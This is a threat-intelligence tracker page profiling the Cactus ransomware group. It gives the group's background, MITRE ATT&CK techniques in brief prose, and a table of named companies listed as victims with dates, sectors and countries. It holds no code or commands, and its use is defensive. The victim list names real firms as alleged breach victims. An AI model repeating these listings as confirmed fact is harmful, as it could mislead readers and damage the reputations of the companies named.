HackerFeeds
All ransomware groups

cactus

248 tracked victims
·first seen 2023-07-03·last activity 2025-03-17

Group profile

The CACTUS ransomware is said to have emerged around March 2023. The group became known for exploiting vulnerabilities to gain initial access and maintain a presence within the organization's infrastructure.<br> <br> There is little known information about the ransomware group, except that it emerged on the mentioned date and, following encryption, a text file named 'cAcTuS.readme.txt' would be created. Additionally, encrypted files were altered to the '.cts1' extension, and data exfiltration and victim extortion were conducted through the use of the service known as Tox.<br>Source: https://github.com/crocodyli/ThreatActors-TTPs

MITRE ATT&CK TTPs

TA0001

Initial Access

  • T1190Exploit Public-Facing Application

    The group exploits vulnerabilities in VPN applications.

TA0002

Execution

  • T1053.005Scheduled Task/Job: Scheduled Task

    The group uses task scheduling for file execution for C2 communication and uses ransomware payload persistence.

  • T1072Software Deployment Tools

    Actors attempt to gain access and use a set of third-party software installed on the network for lateral movement.

TA0003

Persistence

  • T1136Create Account

    The group creates a service/system account to launch the ransomware.

TA0005

Defense Evasion

  • T1027Obfuscated Files or Information

    The group uses file obfuscation techniques to avoid detection by defenses.

  • T1027.002Obfuscated Files or Information: Software Packing

    Actors use packing in ransomware payload to avoid detection by defenses.

  • T1562.001Disable or Modify Tools

    The group uses modification and disabling of security tools to avoid possible malware and access detection.

TA0006

Credential Access

  • T1003.001OS Credential Dumping

    The group performs LSASS memory dump to identify credentials.

  • T1555.003Credentials from Web Browsers

    The group searches for key files from users' browsers to locate stored passwords to proceed with the attack and access other accounts.

TA0007

Discovery

  • T1018Remote System Discovery

    Actors attempt to obtain a list of other systems, hosts, IPs, and any other identifier for lateral movement.

  • T1049System Network Connections Discovery

    Actors use tools to scan the organization's infrastructure systems.

  • T1087Account Discovery

    Actors attempt to obtain a list of accounts, user names, and valid email addresses for later access.

  • T1087.002Account Discovery: Domain Account

    Actors use scripts to identify domain accounts of connected users through Windows event logs.

TA0008

Lateral Movement

  • T1021.001Remote Desktop Protocol

    Cactus actors use valid accounts to log into devices via RDP.

  • T1021.004Remote Services: SSH

    The group uses initial access to set up an SSH tunnel to C2.

  • T1570Lateral Tool Transfer

    Actors use tools or other files between systems to prepare files and encrypt data.

TA0010

Exfiltration

  • T1567.002Exfiltration to Cloud Storage

    Actors exfiltrate data to a cloud storage service through tools such as Rclone and others.

TA0011

Command and Control

  • T1090Proxy

    Actors use connection proxy to route network traffic between systems to avoid detection by security solutions.

  • T1219Remote Access Software

    Actors use RDP connection to access other devices on the internal network.

TA0040

Impact

  • T1486Data Encrypted for Impact

    Actors use ransomware payload to encrypt data and change extensions.

TA0042

Resource Development

  • T1538.008Malvertising

    The threat actor was identified by Microsoft as responsible for the Danabot campaign via malvertising for final delivery of Ransomware Cactus.

Recent victims

showing 50 of 248
DateWebsite / victimSectorCountry
2024-12-25
optiline.com
optiline.comoptiline.com
ConstructionEE
2024-12-16
fplfood.com
fplfood.comfplfood.com
Agriculture and Food ProductionUS
2025-01-09
biagibros.com
biagibros.combiagibros.com
Transportation/LogisticsUS
2025-03-17
assaabloy.com
assaabloy.comassaabloy.com
ManufacturingSE
2025-03-17
kyb.com
kyb.comkyb.com
TechnologyJP
2025-02-09
tempel.com
tempel.comtempel.com
TechnologyUS
2025-02-12
thermoid.com
thermoid.comthermoid.com
ManufacturingUS
2025-03-12
baillie.com
baillie.combaillie.com
ConstructionUS
2025-02-25
urban1.com
urban1.comurban1.com
TechnologyUS
2025-02-26
rocketstores.com
rocketstores.comrocketstores.com
Consumer ServicesUS
2025-03-03
quigleyeye.com
quigleyeye.comquigleyeye.com
HealthcareUS
2025-01-30
stanleyconsultants.com
stanleyconsultants.comstanleyconsultants.com
Business ServicesUS
2025-02-06
caltrol.com
caltrol.comcaltrol.com
TechnologyUS
2025-01-30
holtcat.com
holtcat.comholtcat.com
ManufacturingUS
2025-02-06
alphabaking.com
alphabaking.comalphabaking.com
Agriculture and Food ProductionUS
2025-02-17
bluedge.com
bluedge.combluedge.com
TechnologyUS
2025-02-25
lifting.com
lifting.comlifting.com
ManufacturingUS
2025-02-24
chfindustries.com
chfindustries.comchfindustries.com
ManufacturingUS
2025-02-06
aiibeauty.com
aiibeauty.comaiibeauty.com
Consumer ServicesUS
2025-02-06
formanmills.com
formanmills.comformanmills.com
Consumer ServicesUS
2025-02-06
amalgamatedsugar.com
amalgamatedsugar.comamalgamatedsugar.com
Agriculture and Food ProductionUS
2025-02-12
everelgroup.com
everelgroup.comeverelgroup.com
ManufacturingIT
2025-02-16
regulvar.com
regulvar.comregulvar.com
ConstructionCA
2025-01-30
electrocraft.com
electrocraft.comelectrocraft.com
TechnologyUS
2025-02-06
associatedasset.com
associatedasset.comassociatedasset.com
Financial ServicesUS
2025-02-06
grede.com
grede.comgrede.com
ManufacturingUS
2025-02-24
branchgroup.com
branchgroup.combranchgroup.com
ConstructionUS
2025-02-06
pace-usa.com
pace-usa.compace-usa.com
Transportation/LogisticsUS
2024-01-17
steelwarehouse.com
steelwarehouse.comsteelwarehouse.com
ManufacturingUS
2025-01-21
newhorizonsbaking.com
newhorizonsbaking.comnewhorizonsbaking.com
Agriculture and Food ProductionUS
2025-02-05
uniekinc.com
uniekinc.comuniekinc.com
ManufacturingUS
2025-01-16
midwayimporting.com
midwayimporting.commidwayimporting.com
Consumer ServicesUS
2025-01-15
revitalash.com
revitalash.comrevitalash.com
Consumer ServicesUS
2025-02-03
bestbrands.com
bestbrands.combestbrands.com
Consumer ServicesUS
2025-01-14
kinseysinc.com
kinseysinc.comkinseysinc.com
ManufacturingUS
2025-02-05
steelerubber.com
steelerubber.comsteelerubber.com
ManufacturingUS
2025-02-05
almostfamousclothing.com
almostfamousclothing.comalmostfamousclothing.com
Consumer ServicesUS
2025-02-17
T
This entry has been removed following a request from the company.
Consumer ServicesUS
2025-02-05
ssmcoop.com
ssmcoop.comssmcoop.com
Agriculture and Food ProductionUS
2025-01-21
curtisint.com
curtisint.comcurtisint.com
TechnologyCA
2025-02-12
britannicahome.com
britannicahome.combritannicahome.com
Consumer ServicesUS
2025-01-29
uniquehd.com
uniquehd.comuniquehd.com
ManufacturingUS
2024-01-17
northernresponse.com
northernresponse.comnorthernresponse.com
Consumer ServicesCA
2025-01-28
savoiesfoods.com
savoiesfoods.comsavoiesfoods.com
Agriculture and Food ProductionUS
2025-01-23
mgainnovation.com
mgainnovation.commgainnovation.com
TechnologyUS
2024-12-18
cornwelltools.com
cornwelltools.comcornwelltools.com
Consumer ServicesUS
2025-01-24
rashtiandrashti.com
rashtiandrashti.comrashtiandrashti.com
Business ServicesUS
2025-01-16
alkodistributors.com
alkodistributors.comalkodistributors.com
Consumer ServicesUS
2025-01-14
ttucorp.com
ttucorp.comttucorp.com
TechnologyUS
2025-01-16
jayaapparelgroup.com
jayaapparelgroup.comjayaapparelgroup.com
Consumer ServicesUS